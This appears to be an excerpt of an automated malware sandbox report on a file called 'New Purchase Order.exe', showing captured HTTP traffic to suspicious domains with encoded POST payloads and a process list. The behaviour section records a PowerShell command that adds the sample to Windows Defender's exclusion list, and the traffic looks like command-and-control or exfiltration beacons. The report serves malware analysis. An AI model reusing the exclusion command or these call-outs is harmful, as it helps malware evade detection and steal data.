              Sep 18, 2024 09:03:49.478812933 CEST1236INData Raw: 33 35 35 33 33 39 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 39 2e 38 39 39 34 39 35 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 30 30 2e 37 36 32 37 32 22 0a 20 20 20 20 20 20 20 20 20 20 20
              Data Ascii: 355339" height="9.8994951" width="100.76272" id="rect4553" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlim
              Sep 18, 2024 09:03:49.478827000 CEST896INData Raw: 20 2d 32 2e 35 30 30 31 34 39 2c 31 34 2e 33 33 33 34 33 20 2d 30 2e 31 36 36 37 35 39 2c 34 2e 35 30 30 36 32 20 30 2e 33 33 33 31 32 34 2c 38 2e 36 36 36 33 31 20 31 2e 32 34 39 39 32 32 2c 31 35 2e 35 30 30 36 34 20 30 2e 39 31 36 37 39 38 2c
              Data Ascii: -2.500149,14.33343 -0.166759,4.50062 0.333124,8.66631 1.249922,15.50064 0.916798,6.83434 2.249854,16.33237 3.499902,24.91604 1.250047,8.58368 2.416611,16.24967 4.583438,28.58394 2.166827,12.33427 5.333153,29.33244 8.499966,46.33323"
              Sep 18, 2024 09:03:49.478843927 CEST1236INData Raw: 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20
              Data Ascii: ;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4525" d="m 91.9375,124.09998 c 5.854072,7.16655 11.70824,14.33322 16.21863,20.16651 4.51039,5.83328 7.67706,10.33329 11.92718,16
              Sep 18, 2024 09:03:49.478862047 CEST1236INData Raw: 36 2e 36 36 33 35 36 20 31 2e 34 35 38 35 30 35 2c 35 2e 38 30 34 31 36 20 31 2e 34 35 38 35 30 35 2c 36 2e 39 38 32 35 37 20 32 2e 34 30 32 30 32 31 2c 31 31 2e 31 31 30 35 32 20 30 2e 39 34 33 35 31 37 2c 34 2e 31 32 37 39 35 20 32 2e 38 32 37
              Data Ascii: 6.66356 1.458505,5.80416 1.458505,6.98257 2.402021,11.11052 0.943517,4.12795 2.827535,11.19302 4.065005,16.02501 1.23748,4.832 1.82668,7.42447 2.12139,10.84263 0.29471,3.41815 0.29471,7.65958 -0.11785,20.44893 -0.41255,12.78934 -1.23731,34.115
              Sep 18, 2024 09:03:49.478893042 CEST448INData Raw: 2e 34 37 34 39 39 36 2c 35 34 2e 37 34 32 33 39 20 31 2e 31 31 39 39 33 32 2c 31 39 2e 38 30 33 37 39 20 32 2e 34 31 35 35 37 34 2c 33 37 2e 30 30 30 34 39 20 33 2e 37 31 32 30 30 35 2c 35 34 2e 32 30 37 36 37 22 0a 20 20 20 20 20 20 20 20 20 20
              Data Ascii: .474996,54.74239 1.119932,19.80379 2.415574,37.00049 3.712005,54.20767" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path i
              Sep 18, 2024 09:03:49.479058027 CEST1236INData Raw: 20 2d 31 2e 33 35 35 34 31 39 2c 32 34 2e 35 37 34 31 35 20 30 2e 39 34 32 39 37 34 2c 31 33 2e 30 32 34 39 33 20 32 2e 38 32 38 31 38 32 2c 33 34 2e 34 36 39 31 37 20 35 2e 30 36 36 30 39 35 2c 35 33 2e 38 34 37 34 36 20 32 2e 32 33 37 39 31 33
              Data Ascii: -1.355419,24.57415 0.942974,13.02493 2.828182,34.46917 5.066095,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:m
              Sep 18, 2024 09:03:49.479080915 CEST1236INData Raw: 32 39 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 31 33 32 2e 36 38 37 35 2c 32 36 33 2e 33 34 39 39 38 20 63 20 2d 34 2e 32 32 38 39 2c 31 38 2e 34 31 35 35 20 2d 38 2e 34 35 38 30 36 2c 33 36 2e 38 33 32 31 36 20 2d 31 32 2e 36
              Data Ascii: 29" d="m 132.6875,263.34998 c -4.2289,18.4155 -8.45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" />
              Sep 18, 2024 09:03:49.483865023 CEST1236INData Raw: 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 30 30 31 35 37 34 37 35 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 34 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31
              Data Ascii: stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <path transform="translate(-170.14515,-0.038164)" id="path4567" d="m 321.74355,168.0687 c -1e-5,3.3913 -3.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              16192.168.2.657969162.0.213.94803196C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exe
              TimestampBytes transferredDirectionData
              Sep 18, 2024 09:03:51.352747917 CEST506OUTGET /09dt/?np=rbfG5gS9WKSJFi6SRtlEG1H5qgha+qyBcQUpaxDzzhML0bBwD+Qj3UGhdh/xQ289mI9ftdcjEJi/URIx5SNFY+8px5RXtAkGOTa83eEXxiWZoc8O/jqsRPGTy32XZb2ldw74hvQ=&O4s0=7rrhM HTTP/1.1
              Host: www.kryto.top
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
              Accept-Language: en-US,en;q=0.5
              Connection: close
              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
              Sep 18, 2024 09:03:51.953883886 CEST1236INHTTP/1.1 404 Not Found
              Date: Wed, 18 Sep 2024 07:03:51 GMT
              Server: Apache
              X-Frame-Options: SAMEORIGIN
              Content-Length: 16052
              X-XSS-Protection: 1; mode=block
              Connection: close
              Content-Type: text/html; charset=utf-8
              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
              Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
              Sep 18, 2024 09:03:51.953902960 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 73 74 6f 70 2d 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 73 74 6f 70 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 0a 20 20 20
              Data Ascii: style="stop-color:#000000;stop-opacity:1;" /> </linearGradient> </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="
              Sep 18, 2024 09:03:51.953913927 CEST448INData Raw: 2e 33 33 65 2d 34 20 2d 30 2e 37 38 31 39 38 2c 2d 33 2e 36 37 32 33 38 36 20 2d 31 2e 30 37 34 38 33 38 2c 2d 39 2e 37 36 30 36 35 37 20 2d 30 2e 33 36 31 38 35 2c 2d 37 2e 35 36 34 37 37 39 20 2d 30 2e 35 39 35 32 33 33 2c 2d 31 38 2e 38 35 38
              Data Ascii: .33e-4 -0.78198,-3.672386 -1.074838,-9.760657 -0.36185,-7.564779 -0.595233,-18.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-wi
              Sep 18, 2024 09:03:51.953923941 CEST1236INData Raw: 2e 31 32 38 39 37 20 6d 20 30 2e 35 31 32 31 35 39 2c 30 2e 31 38 32 35 38 20 63 20 2d 31 2e 39 31 34 36 30 33 2c 2d 30 2e 32 33 36 32 31 20 2d 33 2e 35 30 35 35 39 31 2c 31 2e 31 37 38 30 31 20 2d 34 2e 38 36 31 34 34 34 2c 32 2e 36 38 31 31 33
              Data Ascii: .12897 m 0.512159,0.18258 c -1.914603,-0.23621 -3.505591,1.17801 -4.861444,2.68113 -1.355853,1.50312 -2.473764,3.09173 -3.387866,4.59538 -0.914103,1.50365 -1.620209,2.91586 -2.416229,4.41952 -0.79602,1.50365 -1.67928,3.09352 -0.808656,3.24054
              Sep 18, 2024 09:03:51.953934908 CEST1236INData Raw: 2e 31 39 38 33 34 35 2c 37 2e 30 31 30 38 20 2d 31 33 2e 31 39 37 35 35 35 2c 31 33 2e 33 34 33 33 20 2d 31 38 2e 37 38 31 33 37 39 2c 32 30 2e 30 31 30 34 38 20 2d 35 2e 35 38 33 38 32 33 2c 36 2e 36 36 37 31 39 20 2d 31 30 2e 37 34 39 36 35 35
              Data Ascii: .198345,7.0108 -13.197555,13.3433 -18.781379,20.01048 -5.583823,6.66719 -10.749655,13.66605 -13.916608,18.7496 -3.166952,5.08355 -4.333432,8.24971 -4.750315,11.08369 -0.416883,2.83399 -0.08368,5.33304 1.809372,16.25302 1.893048,10.91998 5.3434
              Sep 18, 2024 09:03:51.953946114 CEST1236INData Raw: 22 6d 20 39 36 2e 38 31 32 35 2c 31 32 36 2e 32 32 34 39 38 20 63 20 36 2e 38 39 35 38 36 2c 36 2e 34 35 38 33 36 20 31 33 2e 37 39 31 37 2c 31 32 2e 39 31 36 37 20 31 39 2e 39 38 39 35 37 2c 31 39 2e 31 34 35 38 31 20 36 2e 31 39 37 38 36 2c 36
              Data Ascii: "m 96.8125,126.22498 c 6.89586,6.45836 13.7917,12.9167 19.98957,19.14581 6.19786,6.22912 11.69789,12.22914 17.11456,18.39581 5.41666,6.16667 10.74996,12.49995 14.74993,17.91655 3.99997,5.41659 6.66659,9.91653 7.16671,17.83316 0.50012,7.91664 -
              Sep 18, 2024 09:03:51.953958988 CEST1236INData Raw: 2c 33 2e 37 37 31 33 38 20 33 2e 30 30 35 31 39 2c 35 2e 34 32 31 31 38 20 34 2e 31 38 33 38 2c 39 2e 31 39 32 36 32 20 31 2e 31 37 38 36 31 2c 33 2e 37 37 31 34 34 20 32 2e 34 37 34 37 37 2c 39 2e 36 36 33 31 20 31 2e 39 34 34 34 33 2c 32 33 2e
              Data Ascii: ,3.77138 3.00519,5.42118 4.1838,9.19262 1.17861,3.77144 2.47477,9.6631 1.94443,23.80647 -0.53034,14.14338 -2.88706,36.53226 -5.4209,56.44951 -2.53383,19.91725 -5.24428,37.35836 -7.95503,54.80146" style="display:inline;fill:none;st
              Sep 18, 2024 09:03:51.953974009 CEST328INData Raw: 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 70 78 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b
              Data Ascii: yle="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4545" d="m 83.12978,122.92016 c -2.601311,10.56131 -5.214983,21.172
              Sep 18, 2024 09:03:51.953989983 CEST1236INData Raw: 36 38 2c 35 2e 38 39 32 36 34 20 2d 31 2e 35 39 30 39 32 2c 37 2e 37 37 38 30 35 20 2d 31 2e 38 38 35 37 30 38 2c 31 30 2e 30 37 37 30 36 20 2d 30 2e 32 39 34 37 38 39 2c 32 2e 32 39 39 30 31 20 2d 30 2e 34 31 32 35 36 37 2c 35 2e 30 30 37 39 20
              Data Ascii: 68,5.89264 -1.59092,7.77805 -1.885708,10.07706 -0.294789,2.29901 -0.412567,5.0079 5.1e-5,17.56339 0.412617,12.55548 1.355064,34.93859 2.474996,54.74239 1.119932,19.80379 2.415574,37.00049 3.712005,54.20767" style="display:inline;f
              Sep 18, 2024 09:03:51.954003096 CEST224INData Raw: 34 34 37 35 2c 2d 30 2e 37 30 37 31 36 20 33 2e 33 35 38 32 36 2c 2d 30 2e 31 37 36 37 32 20 36 2e 34 32 33 33 2c 2d 30 2e 31 37 36 37 32 20 39 2e 34 38 37 30 32 2c 2d 30 2e 35 38 39 32 32 20 33 2e 30 36 33 37 32 2c 2d 30 2e 34 31 32 35 31 20 36
              Data Ascii: 4475,-0.70716 3.35826,-0.17672 6.4233,-0.17672 9.48702,-0.58922 3.06372,-0.41251 6.12885,-1.23774 9.1918,-2.06238" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linej
              Sep 18, 2024 09:03:51.958800077 CEST1236INData Raw: 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 36 30 22 0a 20 20 20 20 20 20 20
              Data Ascii: oin:miter;stroke-opacity:1;" /> <path id="path4560" d="m 13.113199,198.16821 c 47.547038,0.40361 95.093071,0.80721 142.638101,1.2108" style="display:inline;fill:none;stroke:#000000;stroke-width:


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              17192.168.2.6579703.33.130.190803196C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exe
              TimestampBytes transferredDirectionData
              Sep 18, 2024 09:03:57.090363026 CEST791OUTPOST /efkd/ HTTP/1.1
              Host: www.angelenterprise.biz
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
              Accept-Encoding: gzip, deflate, br
              Accept-Language: en-US,en;q=0.5
              Content-Length: 207
              Connection: close
              Cache-Control: no-cache
              Content-Type: application/x-www-form-urlencoded
              Origin: http://www.angelenterprise.biz
              Referer: http://www.angelenterprise.biz/efkd/
              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
              Data Raw: 6e 70 3d 46 73 33 2b 6d 75 6c 75 63 5a 43 67 79 45 4d 73 7a 32 59 73 49 50 57 2f 36 38 77 33 45 70 6e 79 2f 58 5a 59 6d 4e 4f 64 50 52 42 62 45 56 44 48 32 6a 59 6f 70 45 37 4f 42 46 71 69 75 79 57 69 41 39 4f 6e 44 44 4c 33 75 45 74 42 56 58 7a 6d 33 4e 6d 65 6c 52 49 61 4a 44 6d 64 51 78 4c 33 43 79 74 51 4a 41 6f 71 31 6e 54 4d 70 4c 59 46 6e 72 67 49 59 63 43 2f 46 43 39 33 56 4e 66 53 5a 53 62 50 77 5a 36 79 44 48 6c 59 75 72 6b 6a 34 30 78 59 4e 38 5a 4a 78 6a 72 35 44 37 53 67 32 43 4b 4f 4c 4e 70 77 75 76 6f 2b 4d 45 57 38 77 75 54 58 6a 65 77 53 6c 50 4b 36 49 6a 4d 37 57 72 63 5a 72 35 37 70 78 7a 61 37
              Data Ascii: np=Fs3+mulucZCgyEMsz2YsIPW/68w3Epny/XZYmNOdPRBbEVDH2jYopE7OBFqiuyWiA9OnDDL3uEtBVXzm3NmelRIaJDmdQxL3CytQJAoq1nTMpLYFnrgIYcC/FC93VNfSZSbPwZ6yDHlYurkj40xYN8ZJxjr5D7Sg2CKOLNpwuvo+MEW8wuTXjewSlPK6IjM7WrcZr57pxza7


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              18192.168.2.6579713.33.130.190803196C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exe
              TimestampBytes transferredDirectionData
              Sep 18, 2024 09:03:59.641825914 CEST815OUTPOST /efkd/ HTTP/1.1
              Host: www.angelenterprise.biz
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
              Accept-Encoding: gzip, deflate, br
              Accept-Language: en-US,en;q=0.5
              Content-Length: 231
              Connection: close
              Cache-Control: no-cache
              Content-Type: application/x-www-form-urlencoded
              Origin: http://www.angelenterprise.biz
              Referer: http://www.angelenterprise.biz/efkd/
              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
              Data Raw: 6e 70 3d 46 73 33 2b 6d 75 6c 75 63 5a 43 67 78 67 49 73 78 52 45 73 66 66 57 38 31 63 77 33 4f 4a 6e 32 2f 58 56 59 6d 49 2b 72 50 43 6c 62 45 31 7a 48 6b 53 59 6f 6b 6b 37 4f 59 31 71 64 67 53 57 54 41 39 4b 46 44 48 4c 33 75 41 39 42 56 56 72 6d 77 2b 4f 5a 6b 42 49 55 52 7a 6d 66 55 78 4c 33 43 79 74 51 4a 42 59 4d 31 6e 37 4d 70 61 6f 46 67 2f 30 48 52 38 43 2b 43 43 39 33 52 4e 65 62 5a 53 62 58 77 62 4f 59 44 45 4e 59 75 72 55 6a 34 6c 78 62 48 38 5a 50 2b 44 72 73 51 72 58 75 7a 7a 32 4e 4b 64 45 55 32 6f 73 6f 4a 79 58 6d 73 64 54 30 78 4f 51 51 6c 4e 53 49 49 44 4d 52 55 72 6b 5a 35 75 33 4f 2b 48 2f 59 32 2f 56 4d 61 61 36 55 4a 66 41 70 51 5a 63 41 52 4d 56 4c 76 51 3d 3d
              Data Ascii: np=Fs3+mulucZCgxgIsxREsffW81cw3OJn2/XVYmI+rPClbE1zHkSYokk7OY1qdgSWTA9KFDHL3uA9BVVrmw+OZkBIURzmfUxL3CytQJBYM1n7MpaoFg/0HR8C+CC93RNebZSbXwbOYDENYurUj4lxbH8ZP+DrsQrXuzz2NKdEU2osoJyXmsdT0xOQQlNSIIDMRUrkZ5u3O+H/Y2/VMaa6UJfApQZcARMVLvQ==


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              19192.168.2.6579723.33.130.190803196C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exe
              TimestampBytes transferredDirectionData
              Sep 18, 2024 09:04:02.246539116 CEST1828OUTPOST /efkd/ HTTP/1.1
              Host: www.angelenterprise.biz
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
              Accept-Encoding: gzip, deflate, br
              Accept-Language: en-US,en;q=0.5
              Content-Length: 1243
              Connection: close
              Cache-Control: no-cache
              Content-Type: application/x-www-form-urlencoded
              Origin: http://www.angelenterprise.biz
              Referer: http://www.angelenterprise.biz/efkd/
              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
              Data Raw: 6e 70 3d 46 73 33 2b 6d 75 6c 75 63 5a 43 67 78 67 49 73 78 52 45 73 66 66 57 38 31 63 77 33 4f 4a 6e 32 2f 58 56 59 6d 49 2b 72 50 43 74 62 45 6d 37 48 31 42 77 6f 72 45 37 4f 51 56 71 6d 67 53 57 4f 41 35 75 42 44 48 48 4a 75 43 31 42 55 32 6a 6d 78 50 4f 5a 74 42 49 55 4e 44 6d 65 51 78 4b 6a 43 32 41 59 4a 41 6b 4d 31 6e 37 4d 70 5a 77 46 32 37 67 48 64 63 43 2f 46 43 39 37 56 4e 65 7a 5a 53 44 74 77 62 61 69 43 31 74 59 75 4c 45 6a 72 6e 5a 62 4c 38 5a 4e 2f 44 71 70 51 71 72 6c 7a 7a 72 38 4b 64 42 7a 32 76 6b 6f 4c 47 61 67 30 4f 54 6a 6f 39 30 4b 39 65 75 4e 48 31 4e 68 61 5a 6b 65 32 63 6e 61 6a 55 72 59 31 71 63 62 65 4b 2f 35 4f 38 38 45 51 38 35 42 46 64 46 48 33 74 47 61 4e 6b 4a 64 38 56 6d 52 77 56 75 51 49 48 56 4d 34 51 74 73 72 37 50 79 62 42 61 53 65 38 55 2f 44 51 44 68 7a 32 38 34 67 4f 75 67 78 4c 61 47 65 71 2f 49 2f 34 6f 52 4b 62 44 6f 63 38 56 64 71 2b 74 71 6f 4f 52 38 43 6f 4d 4e 4d 54 67 50 69 6f 77 6e 64 77 45 76 2b 4b 48 52 6e 76 6b 4b 75 58 6d 34 4d 5a 4a 71 6b 7a 61 [TRUNCATED]
              Data Ascii: np=Fs3+mulucZCgxgIsxREsffW81cw3OJn2/XVYmI+rPCtbEm7H1BworE7OQVqmgSWOA5uBDHHJuC1BU2jmxPOZtBIUNDmeQxKjC2AYJAkM1n7MpZwF27gHdcC/FC97VNezZSDtwbaiC1tYuLEjrnZbL8ZN/DqpQqrlzzr8KdBz2vkoLGag0OTjo90K9euNH1NhaZke2cnajUrY1qcbeK/5O88EQ85BFdFH3tGaNkJd8VmRwVuQIHVM4Qtsr7PybBaSe8U/DQDhz284gOugxLaGeq/I/4oRKbDoc8Vdq+tqoOR8CoMNMTgPiowndwEv+KHRnvkKuXm4MZJqkzaFz76QhPLIoJdZ946sSgxVTVSjdNzzE7/sPLv3vp3704f0G9VqACrVzJXFxUS8mKvsmeRq6a6ciJLapISQS2evNeVIbw10HMjdPukqfAtURcFPkW2HtIJLPbZkaqLc3zwCqJ2mDLqmFPjCwf/n1S54B35udSA/r3gwG1y53rp964xwCbjOmaJFqgHPKKDwFmSIvr5T1dZ14QPLx90ayfn68y2a2F9LwWCR4KY8LpHd5NoUWwa7ZB/4jDY9wRfbWZ2sqx65xNTJhKMl6BmSSemckpR6XbOh/K+Btf6D44RcjDCI2AvJqvpBE0irZjpG/q1qWS2zUaDgQrSz+dwiJK0Mu1+ps9HA9zIihdeUp3ZdzxeNyCa15JqdsXMVfIyqSf1LUYb75ydJi4UKs20lq1GfOwGlYtes+CYfwXl1fFcSZD7CcbUpmswowFjNXAqDokN0r36vWQg6g0ufTrt4V5WwOryP68Q/psmSJis4IVFM7h0EUM8hvlIof6KEfGItovKokIept9UfNPQPHfaOj59x/e2J6qDDjxIUjz3b7rn2Jg7bHyG4UuUEmADFbkWVzlG1oR04rlMRlJQpxgfsHR1VYprbuRRbl42erTHYg9Vx4b2hM8yD9Gk6XYmpeDWIBXC827ELqhZaMFkFmjT6RShycfW5zMLFu9tCh [TRUNCATED]


              Session IDSource IPSource PortDestination IPDestination Port
              20192.168.2.6579733.33.130.19080
              TimestampBytes transferredDirectionData
              Sep 18, 2024 09:04:05.399148941 CEST516OUTGET /efkd/?np=IufelbUCTKOeuwMC8EUMZp6RlpEgAJDIx1td5c35eyVbCG3IzyIKjn3SW0agpxesK9W5YHm3vT0AFFjY1MT7lhYpBivnSDbaB35/ERUm/0qpp+YY+ZI0WrG4EzYBf/iASgSBweg=&O4s0=7rrhM HTTP/1.1
              Host: www.angelenterprise.biz
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
              Accept-Language: en-US,en;q=0.5
              Connection: close
              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
              Sep 18, 2024 09:04:05.880235910 CEST405INHTTP/1.1 200 OK
              Server: openresty
              Date: Wed, 18 Sep 2024 07:04:05 GMT
              Content-Type: text/html
              Content-Length: 265
              Connection: close
              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 6e 70 3d 49 75 66 65 6c 62 55 43 54 4b 4f 65 75 77 4d 43 38 45 55 4d 5a 70 36 52 6c 70 45 67 41 4a 44 49 78 31 74 64 35 63 33 35 65 79 56 62 43 47 33 49 7a 79 49 4b 6a 6e 33 53 57 30 61 67 70 78 65 73 4b 39 57 35 59 48 6d 33 76 54 30 41 46 46 6a 59 31 4d 54 37 6c 68 59 70 42 69 76 6e 53 44 62 61 42 33 35 2f 45 52 55 6d 2f 30 71 70 70 2b 59 59 2b 5a 49 30 57 72 47 34 45 7a 59 42 66 2f 69 41 53 67 53 42 77 65 67 3d 26 4f 34 73 30 3d 37 72 72 68 4d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?np=IufelbUCTKOeuwMC8EUMZp6RlpEgAJDIx1td5c35eyVbCG3IzyIKjn3SW0agpxesK9W5YHm3vT0AFFjY1MT7lhYpBivnSDbaB35/ERUm/0qpp+YY+ZI0WrG4EzYBf/iASgSBweg=&O4s0=7rrhM"}</script></head></html>


              Statistics

              CPU Usage

              Click to jump to process

              Memory Usage

              Click to jump to process

              High Level Behavior Distribution

              Click to dive into process behavior distribution

              Behavior

              Click to jump to process

              System Behavior

              General

              Target ID:0
              Start time:03:01:57
              Start date:18/09/2024
              Path:C:\Users\user\Desktop\New Purchase Order.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\Desktop\New Purchase Order.exe"
              Imagebase:0x980000
              File size:733'696 bytes
              MD5 hash:E392C45451247441D1763095DB3CD57A
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:low
              Has exited:true

              General

              Target ID:3
              Start time:03:01:58
              Start date:18/09/2024
              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              Wow64 process (32bit):true
              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New Purchase Order.exe"
              Imagebase:0xd10000
              File size:433'152 bytes
              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              General

              Target ID:4
              Start time:03:01:58
              Start date:18/09/2024
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff66e660000
              File size:862'208 bytes
              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
              Has elevated privileges:true
